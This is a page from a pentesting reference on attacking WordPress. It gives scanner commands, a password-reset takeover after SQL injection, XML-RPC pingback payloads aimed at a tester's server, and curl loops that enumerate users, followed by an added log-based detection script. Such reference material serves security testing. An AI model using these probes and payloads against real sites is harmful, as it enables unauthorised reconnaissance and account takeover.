Pentest Book
Wordpress

Tools

wpscan --url https://url.com
vulnx -u https://example.com/ --cms --dns -d -w -e
python3 cmsmap.py https://www.example.com -F
python3 wpseku.py --url https://www.target.com --verbose
# Check IP behind WAF:
https://blog.nem.ec/2020/01/22/discover-cloudflare-wordpress-ip/

# SQLi in WP and can't crack users hash:
1. Request password reset.
2. Go to site.com/wp-login.php?action=rp&key={ACTIVATION_KEY}&login={USERNAME}

# XMLRPC
# https://github.com/nullfil3/xmlrpc-scan
# https://github.com/relarizky/wpxploit
# https://nitesculucian.github.io/2019/07/01/exploiting-the-xmlrpc-php-on-all-wordpress-versions/

# pingback.xml:
<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param>
      <value>
        <string>http://10.0.0.1/hello/world</string>
      </value>
    </param>
    <param>
      <value>
        <string>https://10.0.0.1/hello/world/</string>
      </value>
    </param>
  </params>
</methodCall>

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>

# List methods:
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

curl -X POST -d @pingback.xml https://example.com/xmlrpc.php

# Evidence xmlrpc:
curl -d '<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>demo.sayHello</methodName><params/></methodCall>' -k https://example.com/xmlrpc.php

# Enum User:
for i in {1..50}; do curl -s -L -i "https://example.com/wordpress?author=$i" | grep -E -o "Location:.*" | awk -F/ '{print $NF}'; done
site.com/wp-json/wp/v2/users/
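Detection side of the probes above, as an added example that is not part of the original page: a scan of web-server access logs for ?author=N sweeps, POSTs to xmlrpc.php and requests to the REST users endpoint. The combined log format, the threshold of 3 distinct author IDs, the finding labels and the scan() function name are assumptions, and the sample log lines are constructed.

```python
import re
from collections import defaultdict

# Constructed sample lines in combined log format (not taken from a real site).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /wordpress?author=1 HTTP/1.1" 301 0 "-" "curl/8.0"
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /wordpress?author=2 HTTP/1.1" 301 0 "-" "curl/8.0"
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /wordpress?author=3 HTTP/1.1" 404 0 "-" "curl/8.0"
198.51.100.9 - - [01/Jan/2024:10:05:00 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "curl/8.0"
198.51.100.9 - - [01/Jan/2024:10:05:03 +0000] "GET /wp-json/wp/v2/users/ HTTP/1.1" 200 812 "-" "curl/8.0"
192.0.2.15 - - [01/Jan/2024:10:07:00 +0000] "GET /?author=4 HTTP/1.1" 301 0 "-" "Mozilla/5.0"
192.0.2.15 - - [01/Jan/2024:10:07:05 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3}')
AUTHOR_RE = re.compile(r"[?&]author=(\d+)")
USERS_RE = re.compile(r"/wp-json/wp/v2/users(/|$)")


def scan(log_text, author_threshold=3):
    """Map client IP -> sorted findings for the probes shown on this page."""
    author_ids = defaultdict(set)   # distinct ?author=N values per client
    findings = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                # skip lines that are not in the expected format
        ip, method, target = m.groups()
        path = target.split("?", 1)[0]
        a = AUTHOR_RE.search(target)
        if a:
            author_ids[ip].add(int(a.group(1)))
        # Access logs carry no POST body, so any POST to xmlrpc.php is flagged.
        if method == "POST" and path.endswith("/xmlrpc.php"):
            findings[ip].add("xmlrpc-post")
        if USERS_RE.search(path):
            findings[ip].add("rest-user-listing")
    # A single ?author= hit can be a normal archive link; many distinct IDs is a sweep.
    for ip, ids in author_ids.items():
        if len(ids) >= author_threshold:
            findings[ip].add("author-enum")
    return {ip: sorted(f) for ip, f in findings.items()}


if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG).items():
        print(ip, ", ".join(hits))
```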
Last modified 7mo ago